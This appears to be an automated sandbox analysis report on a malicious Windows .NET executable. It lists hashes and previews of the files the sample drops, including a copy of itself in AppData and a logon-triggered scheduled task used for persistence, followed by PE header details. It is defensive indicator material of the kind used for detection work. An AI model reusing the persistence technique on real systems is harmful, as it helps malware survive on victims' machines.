                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.7.0.8.<./.P.i.
                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):4634
                                                                              Entropy (8bit):4.4775600851790625
                                                                              Encrypted:false
                                                                              SSDEEP:48:cvIwWl8zsjJg77aI96VWpW8VYcYm8M4JfjFY+q87x08Tk1uv9cvd:uIjf9I7Qk7V8JKc08T99cvd
                                                                              MD5:FBC5BAB5B97BAC52210E56C94508CDC9
                                                                              SHA1:311D078E706A3DF16BDB0260D6FD07E0F9630311
                                                                              SHA-256:D194039BA2901D5546D1EF77C82A8015081AF58F4F38CD1F05DAA49BCB243854
                                                                              SHA-512:B5B04A09C8D01BB8E69AC0646928D034B83A8523292FAB0826398F9A5F4187A2290B6262FDB274A798C05EBDDDE17144858203CB0F81F23B66F2E69A7FFF5590
                                                                              Malicious:false
                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="524158" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                              Process:C:\Users\user\AppData\Roaming\AcEnrS.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1216
                                                                              Entropy (8bit):5.34331486778365
                                                                              Encrypted:false
                                                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                              Malicious:false
                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                              Process:C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1216
                                                                              Entropy (8bit):5.34331486778365
                                                                              Encrypted:false
                                                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                              Malicious:true
                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):2232
                                                                              Entropy (8bit):5.380805901110357
                                                                              Encrypted:false
                                                                              SSDEEP:48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:lGLHyIFKL3IZ2KRH9Oug8s
                                                                              MD5:16AD599332DD2FF94DA0787D71688B62
                                                                              SHA1:02F738694B02E84FFE3BAB7DE5709001823C6E40
                                                                              SHA-256:452876FE504FC0DBEDBD7F8467E94F6E80002DB4572D02C723ABC69F8DF0B367
                                                                              SHA-512:A96158FDFFA424A4AC01220EDC789F3236C03AAA6A7C1A3D8BE62074B4923957E6CFEEB6E8852F9064093E0A290B0E56E4B5504D18113A7983F48D5388CEC747
                                                                              Malicious:false
                                                                              Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe
                                                                              File Type:XML 1.0 document, ASCII text
                                                                              Category:dropped
                                                                              Size (bytes):1579
                                                                              Entropy (8bit):5.094399102336921
                                                                              Encrypted:false
                                                                              SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtexvn:cgergYrFdOFzOzN33ODOiDdKrsuTSv
                                                                              MD5:60495167E9290F15A6C1A65F355D79D3
                                                                              SHA1:FF28871FFE7070DBBC9BACE649642286B4988639
                                                                              SHA-256:89DC922D44F3EED254AFF090967D6244449E299DDBBFFFFDF2B5F56F8BFAE763
                                                                              SHA-512:129559656BFA9673210303D070F1A17C836E142C820732511BBAA493A8CE5B2AE3CCFDB75EDCFB96E4862BD06E1AB07B9F1C8DA19F8C184C45A2B0DC7B08A9BB
                                                                              Malicious:true
                                                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                                                                              Process:C:\Users\user\AppData\Roaming\AcEnrS.exe
                                                                              File Type:XML 1.0 document, ASCII text
                                                                              Category:dropped
                                                                              Size (bytes):1579
                                                                              Entropy (8bit):5.094399102336921
                                                                              Encrypted:false
                                                                              SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtexvn:cgergYrFdOFzOzN33ODOiDdKrsuTSv
                                                                              MD5:60495167E9290F15A6C1A65F355D79D3
                                                                              SHA1:FF28871FFE7070DBBC9BACE649642286B4988639
                                                                              SHA-256:89DC922D44F3EED254AFF090967D6244449E299DDBBFFFFDF2B5F56F8BFAE763
                                                                              SHA-512:129559656BFA9673210303D070F1A17C836E142C820732511BBAA493A8CE5B2AE3CCFDB75EDCFB96E4862BD06E1AB07B9F1C8DA19F8C184C45A2B0DC7B08A9BB
                                                                              Malicious:false
                                                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                                                                              Process:C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):769536
                                                                              Entropy (8bit):7.739123825883422
                                                                              Encrypted:false
                                                                              SSDEEP:12288:L3TmP4kyFSnIZgc1D7COp2JwlmsxS4kZHtfi390V+KA7rC7LOmDZ:2gBOI9D7CO0JqTSRNfiQsG7LOmD
                                                                              MD5:102C9CE1C659517C4EA924C2044305B7
                                                                              SHA1:942B0A7E2077ECA38B9B6FF16D89722CBBBF7002
                                                                              SHA-256:B31CBC6EC2EB2B790C422F0F960BB1436106D92958703CB005CCDEF38887E310
                                                                              SHA-512:ECA6ED6A871E9FBEE67FEB73534BFF544F052D6B3E1058A68B4602F159F089193F0F576384E6CD49373D50200D71BB4AEADD151C0FB81A77A6246849AF2F39F6
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: ReversingLabs, Detection: 47%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....M...............0.................. ........@.. ....................... ............@.................................~...O.......<...........................t...p............................................ ............... ..H............text....... ...................... ..`.rsrc...<...........................@..@.reloc..............................@..B........................H.......<_...C..........D...0...........................................z..}......}.....(.......(.....*..0..P..........{....o.....{....o....(.........,"...{....o.....{....o.....(......+....}.....*.0..\.........r...p(......,..r...pr)..p(....&..}......r...p(......,..r7..pr)..p(....&..}......{.....+..*.0...........r...p.r...p.~N...s.......o.....~O......s......r_..p.s........o......o....&..o.....+....o....( ......o....( ......o!.......-..o".......,7...(#.......,.rm..pr)..p(....&+
                                                                              Process:C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):26
                                                                              Entropy (8bit):3.95006375643621
                                                                              Encrypted:false
                                                                              SSDEEP:3:ggPYV:rPYV
                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                              Malicious:true
                                                                              Preview:[ZoneTransfer]....ZoneId=0
                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Entropy (8bit):7.739123825883422
                                                                              TrID:
                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                              File name:WIpGif4IRrFfamQ.exe
                                                                              File size:769'536 bytes
                                                                              MD5:102c9ce1c659517c4ea924c2044305b7
                                                                              SHA1:942b0a7e2077eca38b9b6ff16d89722cbbbf7002
                                                                              SHA256:b31cbc6ec2eb2b790c422f0f960bb1436106d92958703cb005ccdef38887e310
                                                                              SHA512:eca6ed6a871e9fbee67feb73534bff544f052d6b3e1058a68b4602f159f089193f0f576384e6cd49373d50200d71bb4aeadd151c0fb81a77a6246849af2f39f6
                                                                              SSDEEP:12288:L3TmP4kyFSnIZgc1D7COp2JwlmsxS4kZHtfi390V+KA7rC7LOmDZ:2gBOI9D7CO0JqTSRNfiQsG7LOmD
                                                                              TLSH:E0F4D0D43F36B71ACEB85A71852ADDF552A52D68B000B9E36DCD3B87359D211AE0CF02
                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....M................0.................. ........@.. ....................... ............@................................
                                                                              Icon Hash:00928e8e8686b000
                                                                              Entrypoint:0x4bd1d2
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x89F24D9A [Mon May 4 13:16:10 2043 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:4
                                                                              OS Version Minor:0
                                                                              File Version Major:4
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:4
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                              Instruction
                                                                              jmp dword ptr [00402000h]
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xbd17e0x4f.text
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xbe0000x63c.rsrc
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xc00000xc.reloc
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0xbba740x70.text
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
